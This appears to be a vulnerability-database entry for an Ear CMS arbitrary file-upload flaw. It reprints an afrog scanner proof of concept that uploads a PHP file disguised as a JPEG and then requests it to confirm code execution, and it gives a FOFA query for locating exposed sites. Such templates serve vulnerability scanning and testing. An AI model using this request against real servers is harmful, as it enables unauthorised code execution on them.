earcms-index-uplog-php-file-upload: Ear CMS index file upload

日期: 2025-09-01 | 影响软件: Ear CMS | POC: 已公开

漏洞描述

FOFA: app="EearCMS"

PoC代码[已公开]

id: earcms-index-uplog-php-file-upload

info:
  name: Ear CMS index file upload
  author: xpoc,sharecast
  severity: critical
  verified: true
  description: |
    FOFA: app="EearCMS"
  reference:
    - https://zhuanlan.zhihu.com/p/81934322
  tags: earcms,upload
  created: 2023/06/23

set:
    r1: randomInt(40000, 44800)
    r2: randomInt(44801, 84800)
    r3: md5(string(r2))
    rboundary: randomLowercase(8)
    randname: randomLowercase(6)
rules:
  r0:
    request:
      method: POST
      path: /source/pack/upload/index-uplog.php
      headers:
          Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"time\"\r\n\n{{r3}}\r\n------WebKitFormBoundary{{rboundary}}\r\nContent-Disposition: form-data; name=\"app\"; filename=\"{{randname}}.php\"\r\nContent-Type: image/jpeg\r\n\r\n<?php echo md5({{r1}});unlink(__FILE__);?>\r\n------WebKitFormBoundary{{rboundary}}--\r\n"
    expression: response.status == 200 && response.body.bcontains(b"php")
  r1:
    request:
      method: GET
      path: /data/tmp/{{r3}}.php
    expression: response.status == 200 && response.body.bcontains(bytes(md5(string(r1))))
expression: r0() && r1()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/earcms-index-uplog-php-file-upload.yaml

相关漏洞推荐